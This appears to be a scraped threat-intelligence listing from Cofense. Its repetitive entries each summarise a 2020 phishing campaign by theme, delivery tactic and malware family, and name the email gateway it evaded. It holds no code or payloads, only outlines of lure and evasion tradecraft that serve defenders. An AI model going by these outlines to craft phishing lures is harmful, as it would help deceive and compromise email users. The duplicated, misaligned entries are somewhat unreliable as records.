PHISHING EXAMPLE DESCRIPTION: This invoice-themed attack delivers a link to Google Drive that will download a VBS Loader to install the WSH Remote Access Trojan.

Real Phishing Example: This phish uses a bonus theme to deliver the BazarBackdoor malware by way of Google Docs links.

ENVIRONMENTS: Mimecast

TYPE: BazarBackdoor

POSTED ON: 09/09/2020

TACTIC: Link

THEME: Bonus

PHISHING EXAMPLE DESCRIPTION: This phish uses a bonus theme to deliver the BazarBackdoor malware by way of Google Docs links.

Real Phishing Example: This phish uses a bonus theme to deliver the BazarBackdoor malware by way of Google Docs links.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: BazarBackdoor

POSTED ON: 09/09/2020

TACTIC: Link

THEME: Bonus

PHISHING EXAMPLE DESCRIPTION: This phish uses a bonus theme to deliver the BazarBackdoor malware by way of Google Docs links.

Real Phishing Example: This response-themed phish delivers embedded links that will lead to a password-protected .zip archive containing VBS Droppers to run Ursnif.

ENVIRONMENTS: Proofpoint

TYPE: Ursnif

POSTED ON: 09/09/2020

TACTIC: Link

THEME: Response

PHISHING EXAMPLE DESCRIPTION: This response-themed phish delivers embedded links that will lead to a password-protected .zip archive containing VBS Droppers to run Ursnif.

Real Phishing Example: This response-themed phish delivers embedded links that will lead to a password-protected .zip archive containing VBS Droppers to run Ursnif.

ENVIRONMENTS: Ironport

TYPE: Ursnif

POSTED ON: 09/09/2020

TACTIC: Link

THEME: Response

PHISHING EXAMPLE DESCRIPTION: This response-themed phish delivers embedded links that will lead to a password-protected .zip archive containing VBS Droppers to run Ursnif.

Real Phishing Example: This response-themed phish delivers embedded links that will lead to a password-protected .zip archive containing VBS Droppers to run Ursnif.

ENVIRONMENTS: Symantec

TYPE: Ursnif

POSTED ON: 09/09/2020

TACTIC: Link

THEME: Response

PHISHING EXAMPLE DESCRIPTION: This response-themed phish delivers embedded links that will lead to a password-protected .zip archive containing VBS Droppers to run Ursnif.

Real Phishing Example: This phish pretends to be a security awareness reminder but delivers a link to a credential harvesting site.

ENVIRONMENTS: Mimecast

TYPE: Credential Theft

POSTED ON: 09/08/2020

TACTIC: Link

THEME: Notification

PHISHING EXAMPLE DESCRIPTION: This phish pretends to be a security awareness reminder but delivers a link to a credential harvesting site.

Learn More
Real Phishing Example: This response-themed attack delivers a password-protected .zip archive containing a macro-laden Microsoft Office document with a .hta downloader for Iced-ID.

ENVIRONMENTS: Proofpoint

TYPE: Iced-ID

POSTED ON: 09/08/2020

TACTIC: Attachment-ZIP

THEME: Response

PHISHING EXAMPLE DESCRIPTION: This response-themed attack delivers a password-protected .zip archive containing a macro-laden Microsoft Office document with a .hta downloader for Iced-ID.

Real Phishing Example: This quotation-themed phish included a malicious link in the attached PDF that led to the AZORult Stealer malware.

ENVIRONMENTS: Proofpoint

TYPE: AZORult

POSTED ON: 09/07/2020

TACTIC: Attachment-PDF

THEME: Quotation

PHISHING EXAMPLE DESCRIPTION: This quotation-themed phish included a malicious link in the attached PDF that led to the AZORult Stealer malware.

Real Phishing Example: This invoice-themed phish hides a link behind an image that leads to a credential harvesting site.

ENVIRONMENTS: Proofpoint

TYPE: Credential Theft

POSTED ON: 09/04/2020

TACTIC: Link

THEME: Invoice

PHISHING EXAMPLE DESCRIPTION: This invoice-themed phish hides a link behind an image that leads to a credential harvesting site.

Real Phishing Example: This invoice-themed phish uses an image of a PDF document to hide a link to a Pyrogenic Stealer download.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Pyrogenic Stealer

POSTED ON: 09/03/2020

TACTIC: Link

THEME: Invoice

PHISHING EXAMPLE DESCRIPTION: This invoice-themed phish uses an image of a PDF document to hide a link to a Pyrogenic Stealer download.

Real Phishing Example: This invoice-themed phish uses an image of a PDF document to hide a link to a Pyrogenic Stealer download.

ENVIRONMENTS: Symantec

TYPE: Pyrogenic Stealer

POSTED ON: 09/03/2020

TACTIC: Link

THEME: Invoice

PHISHING EXAMPLE DESCRIPTION: This invoice-themed phish uses an image of a PDF document to hide a link to a Pyrogenic Stealer download.

Real Phishing Example: This invoice-themed phish uses an image of a PDF document to hide a link to a Pyrogenic Stealer download.

ENVIRONMENTS: Proofpoint

TYPE: Pyrogenic Stealer

POSTED ON: 09/03/2020

TACTIC: Link

THEME: Invoice

PHISHING EXAMPLE DESCRIPTION: This invoice-themed phish uses an image of a PDF document to hide a link to a Pyrogenic Stealer download.

Real Phishing Example: This phish spoofs WeTransfer and delivers links to Microsoft OneDrive-hosted .htm files that harvest email login credentials.

ENVIRONMENTS: Proofpoint

TYPE: Credential Theft

POSTED ON: 09/02/2020

TACTIC: Link

THEME: Notification

PHISHING EXAMPLE DESCRIPTION: This phish spoofs WeTransfer and delivers links to Microsoft OneDrive-hosted .htm files that harvest email login credentials.

Real Phishing Example: This phish uses Microsoft OneDrive links behind a finance-themed image to deliver a .ace archive containing the NanoCore Remote Access Trojan.

ENVIRONMENTS: Proofpoint

TYPE: NanoCore

POSTED ON: 09/01/2020

TACTIC: Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: This phish uses Microsoft OneDrive links behind a finance-themed image to deliver a .ace archive containing the NanoCore Remote Access Trojan.

Learn More
Real Phishing Example: This finance-themed attack uses a Microsoft Excel attachment with embedded links to a credential harvesting site.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Theft

POSTED ON: 08/31/2020

TACTIC: Attachment-XLSX

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: This finance-themed attack uses a Microsoft Excel attachment with embedded links to a credential harvesting site.

Real Phishing Example: This document-themed phish involves an attack chain that starts with embedded Microsoft OneDrive links leading to a Googleapis domain designed to perform credential harvesting.

ENVIRONMENTS: Proofpoint

TYPE: Credential Theft

POSTED ON: 08/31/2020

TACTIC: Link

THEME: Document

PHISHING EXAMPLE DESCRIPTION: This document-themed phish involves an attack chain that starts with embedded Microsoft OneDrive links leading to a Googleapis domain designed to perform credential harvesting.

Real Phishing Example: This notification-themed attack came in 2 flavors: embedded links and Microsoft Word attachments. They both used a VBS script to download TrickBot.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: TrickBot

POSTED ON: 08/31/2020

TACTIC: Attachment-DOC

THEME: Notification

PHISHING EXAMPLE DESCRIPTION: This notification-themed attack came in 2 flavors: embedded links and Microsoft Word attachments. They both used a VBS script to download TrickBot.

Real Phishing Example: This notification-themed attack came in 2 flavors: embedded links and Microsoft Word attachments. They both used a VBS script to download TrickBot.

ENVIRONMENTS: Ironport

TYPE: TrickBot

POSTED ON: 08/31/2020

TACTIC: Attachment-DOC

THEME: Notification

PHISHING EXAMPLE DESCRIPTION: This notification-themed attack came in 2 flavors: embedded links and Microsoft Word attachments. They both used a VBS script to download TrickBot.

Real Phishing Example: This document-themed attack pretends to be from a lawyer but delivers an HTML attachment designed to steal Office 365 credentials.

ENVIRONMENTS: Proofpoint

TYPE: Credential Theft

POSTED ON: 08/27/2020

TACTIC: Attachment-HTML

THEME: Document

PHISHING EXAMPLE DESCRIPTION: This document-themed attack pretends to be from a lawyer but delivers an HTML attachment designed to steal Office 365 credentials.

Real Phishing Example: This finance-themed phish delivers a .xz attachment that installs the Agent Tesla Keylogger.

ENVIRONMENTS: Ironport

TYPE: Agent Tesla

POSTED ON: 08/27/2020

TACTIC: Attachment-XZ

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: This finance-themed phish delivers a .xz attachment that installs the Agent Tesla Keylogger.

Real Phishing Example: This tax-themed phish delivers a URL leading to a credential harvesting site.

ENVIRONMENTS: Proofpoint

TYPE: Credential Theft

POSTED ON: 08/27/2020

TACTIC: Link

THEME: Tax

PHISHING EXAMPLE DESCRIPTION: This tax-themed phish delivers a URL leading to a credential harvesting site.

Real Phishing Example: This tax-themed phish delivers a URL leading to a credential harvesting site.

ENVIRONMENTS: Mimecast

TYPE: Credential Theft

POSTED ON: 08/27/2020

TACTIC: Link

THEME: Tax

PHISHING EXAMPLE DESCRIPTION: This tax-themed phish delivers a URL leading to a credential harvesting site.

Real Phishing Example: This reply chain attack delivers a Microsoft PowerPoint Show file with embedded url shortcut files.

ENVIRONMENTS: Proofpoint

TYPE: URL

POSTED ON: 08/25/2020

TACTIC: Attachment-PPSX

THEME: Reply Chain

PHISHING EXAMPLE DESCRIPTION: This reply chain attack delivers a Microsoft PowerPoint Show file with embedded url shortcut files.

Real Phishing Example: This reply chain attack delivers a Microsoft PowerPoint Show file with embedded url shortcut files.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: URL

POSTED ON: 08/25/2020

TACTIC: Attachment-PPSX

THEME: Reply Chain

PHISHING EXAMPLE DESCRIPTION: This reply chain attack delivers a Microsoft PowerPoint Show file with embedded url shortcut files.

Real Phishing Example: This voicemail-themed phish delivers a .html attachment to perform credential theft.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Theft

POSTED ON: 08/25/2020

TACTIC: Attachment-HTML

THEME: Voicemail

PHISHING EXAMPLE DESCRIPTION: This voicemail-themed phish delivers a .html attachment to perform credential theft.

Real Phishing Example: This finance-themed phish delivers a linked image with a GuLoader to Async Remote Access Trojan attack chain.

ENVIRONMENTS: Proofpoint

TYPE: Async RAT

POSTED ON: 08/25/2020

TACTIC: Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: This finance-themed phish delivers a linked image with a GuLoader to Async Remote Access Trojan attack chain.

Learn More
Real Phishing Example: This finance-themed phish delivers a linked image with a GuLoader to Async Remote Access Trojan attack chain.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Async RAT

POSTED ON: 08/25/2020

TACTIC: Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: This finance-themed phish delivers a linked image with a GuLoader to Async Remote Access Trojan attack chain.

Learn More
Real Phishing Example: This invoice-themed phish links to GuLoader, which will install Loki Bot.

ENVIRONMENTS: Proofpoint

TYPE: Loki Bot

POSTED ON: 08/24/2020

TACTIC: Link

THEME: Invoice

PHISHING EXAMPLE DESCRIPTION: This invoice-themed phish links to GuLoader, which will install Loki Bot.

Learn More
Real Phishing Example: This finance-themed attack uses a Microsoft Excel attachment to lure the recipient to a credential harvesting site.

ENVIRONMENTS: Ironport

TYPE: Credential Theft

POSTED ON: 08/24/2020

TACTIC: Attachment-XLSX

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: This finance-themed attack uses a Microsoft Excel attachment to lure the recipient to a credential harvesting site.

Real Phishing Example: This document-themed phish delivers a Microsoft Excel attachment with embedded links to a credential harvesting site.

ENVIRONMENTS: Mimecast

TYPE: Credential Theft

POSTED ON: 08/23/2020

TACTIC: Attachment-XLSX

THEME: Document

PHISHING EXAMPLE DESCRIPTION: This document-themed phish delivers a Microsoft Excel attachment with embedded links to a credential harvesting site.

Real Phishing Example: This finance-themed phish included an attached HTML file spoofing a Microsoft login page to steal credentials.

ENVIRONMENTS: Proofpoint

TYPE: Credential Theft

POSTED ON: 08/22/2020

TACTIC: Attachment-HTML

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: This finance-themed phish included an attached HTML file spoofing a Microsoft login page to steal credentials.

Real Phishing Example: This finance-themed phish included an attached HTML file spoofing a Microsoft login page to steal credentials.

ENVIRONMENTS: Symantec

TYPE: Credential Theft

POSTED ON: 08/22/2020

TACTIC: Attachment-HTML

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: This finance-themed phish included an attached HTML file spoofing a Microsoft login page to steal credentials.

Real Phishing Example: This invoice-themed phish delivers a macro-enabled Microsoft Office document hosted on Google Docs. From there, the macros install the recently discovered BazarBackdoor.

ENVIRONMENTS: Proofpoint

TYPE: BazarBackdoor

POSTED ON: 08/21/2020

TACTIC: Link

THEME: Invoice

PHISHING EXAMPLE DESCRIPTION: This invoice-themed phish delivers a macro-enabled Microsoft Office document hosted on Google Docs. From there, the macros install the recently discovered BazarBackdoor.

Real Phishing Example: This invoice-themed phish delivers a macro-enabled Microsoft Office document hosted on Google Docs. From there, the macros install the recently discovered BazarBackdoor.

ENVIRONMENTS: Symantec

TYPE: BazarBackdoor

POSTED ON: 08/21/2020

TACTIC: Link

THEME: Invoice

PHISHING EXAMPLE DESCRIPTION: This invoice-themed phish delivers a macro-enabled Microsoft Office document hosted on Google Docs. From there, the macros install the recently discovered BazarBackdoor.

Real Phishing Example: This finance-themed phish delivers GuLoader to download and activate the Remcos Remote Access Trojan.

ENVIRONMENTS: Proofpoint

TYPE: Remcos RAT

POSTED ON: 08/20/2020

TACTIC: Attachment-XXE

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: This finance-themed phish delivers GuLoader to download and activate the Remcos Remote Access Trojan.

Real Phishing Example: This invoice-themed phish uses an image crafted to look like a PDF document to hide a link to the NetWire malware.

ENVIRONMENTS: Ironport

TYPE: NetWire

POSTED ON: 08/20/2020

TACTIC: Link

THEME: Invoice

PHISHING EXAMPLE DESCRIPTION: This invoice-themed phish uses an image crafted to look like a PDF document to hide a link to the NetWire malware.

Real Phishing Example: This finance-themed attack delivers embedded links to lure the recipient to a credential harvesting site.

ENVIRONMENTS: Symantec

TYPE: Credential Theft

POSTED ON: 08/19/2020

TACTIC: Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: This finance-themed attack delivers embedded links to lure the recipient to a credential harvesting site.

Real Phishing Example: This finance-themed attack delivers embedded links to lure the recipient to a credential harvesting site.

ENVIRONMENTS: Mimecast

TYPE: Credential Theft

POSTED ON: 08/19/2020

TACTIC: Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: This finance-themed attack delivers embedded links to lure the recipient to a credential harvesting site.

Real Phishing Example: This shipping theme phish uses a .xxe attachment to deliver Remcos Remote Access Trojan by way of the GuLoader malware held within the delivered archive.

ENVIRONMENTS: Proofpoint

TYPE: Remcos RAT

POSTED ON: 08/19/2020

TACTIC: Attachment-XXE

THEME: Delivery

PHISHING EXAMPLE DESCRIPTION: This shipping theme phish uses a .xxe attachment to deliver Remcos Remote Access Trojan by way of the GuLoader malware held within the delivered archive.

Real Phishing Example: This finance-themed phish uses a .xxe attachment to install the Smoke Loader malware,

ENVIRONMENTS: Proofpoint

TYPE: Smoke Loader

POSTED ON: 08/19/2020

TACTIC: Attachment-XXE

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: This finance-themed phish uses a .xxe attachment to install the Smoke Loader malware,

Real Phishing Example: This document-themed phish promises a hotel reservation confirmation but delivers an encrypted .zip archive designed to install Iced-ID malware.

ENVIRONMENTS: Ironport

TYPE: Iced-ID

POSTED ON: 08/18/2020

TACTIC: Attachment-ZIP

THEME: Document

PHISHING EXAMPLE DESCRIPTION: This document-themed phish promises a hotel reservation confirmation but delivers an encrypted .zip archive designed to install Iced-ID malware.

Real Phishing Example: This finance-themed phish uses a link disguised as a .zip file to lure the recipient into installing the Banload Loader.

ENVIRONMENTS: Ironport

TYPE: Banload

POSTED ON: 08/17/2020

TACTIC: Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: This finance-themed phish uses a link disguised as a .zip file to lure the recipient into installing the Banload Loader.

Real Phishing Example: This German-language, quote-themed phish uses a linked image that looks like a quote but leads to the Agent Tesla Keylogger.

ENVIRONMENTS: Proofpoint

TYPE: Agent Tesla

POSTED ON: 08/17/2020

TACTIC: Link

THEME: Quotation

PHISHING EXAMPLE DESCRIPTION: This German-language, quote-themed phish uses a linked image that looks like a quote but leads to the Agent Tesla Keylogger.

Real Phishing Example: This finance-themed attack delivers the Smoke Loader using a .xxe attachment that will then install both the Remcos and NetWire Remote Access Trojans.

ENVIRONMENTS: Proofpoint

TYPE: Remcos RAT

POSTED ON: 08/17/2020

TACTIC: Attachment-XXE

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: This finance-themed attack delivers the Smoke Loader using a .xxe attachment that will then install both the Remcos and NetWire Remote Access Trojans.

Real Phishing Example: This delivery-themed phish delivers embedded links to lure a recipient into clicking and giving up their credentials.

ENVIRONMENTS: Proofpoint

TYPE: Credential Theft

POSTED ON: 08/15/2020

TACTIC: Link

THEME: Delivery

PHISHING EXAMPLE DESCRIPTION: This delivery-themed phish delivers embedded links to lure a recipient into clicking and giving up their credentials.

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks.